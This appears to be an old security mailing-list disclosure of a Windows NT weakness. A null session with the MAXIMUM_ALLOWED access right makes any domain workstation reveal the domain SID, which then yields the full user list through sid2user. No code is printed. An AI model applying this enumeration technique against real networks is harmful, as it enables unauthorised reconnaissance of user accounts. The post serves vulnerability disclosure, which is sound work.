Windows NT and account list leak ! A new SID usage

[longprep () HOTMAIL COM (Pascal Longpre)]

This may not be new but I haven't seen it anywhere else so 
here it is.

- Description -
It is possible to list the whole user list of a domain by 
querying any workstation on that domain. Even if the domain 
controller is hidden behind a firewall or has IP filtering 
enabled, the list comes out gracefully since the 
workstation forwards the query for you.
I suspect that this may even work on a workstation 
connected to it's DC through a VPN but I haven't tested it 
yet.

- Explanations -
The idea is to get the workstation to spit it's domain SID 
with the LsaQueryInformationPolicy() function. Normally, 
that fonction would require the "GENERIC_READ | 
GENERIC_EXECUTE" access rights in order to work but I 
discovered that by simply using the "MAXIMUM_ALLOWED" 
access right it works through the good old null session.

- Exploitation -
I wrote a small program called "dom2sid" demonstrating 
this. It should be available shortly on the securityfocus 
free tools list. It returns the computer/domain names and 
SIDs. You can then feed this to the popular sid2user tool 
and get the whole user list.If both SIDs are equal, you 
found a DC.

- Fix - 
The "restrict anonymous" solution provided by Microsoft 
doesn't help here. The only way I was able to stop this 
behavior was to use a program called fixpol.exe. Don't ask 
me where I found that one, I don't remember...

Enjoy !!

If this is old stuff, well just forget about this message !!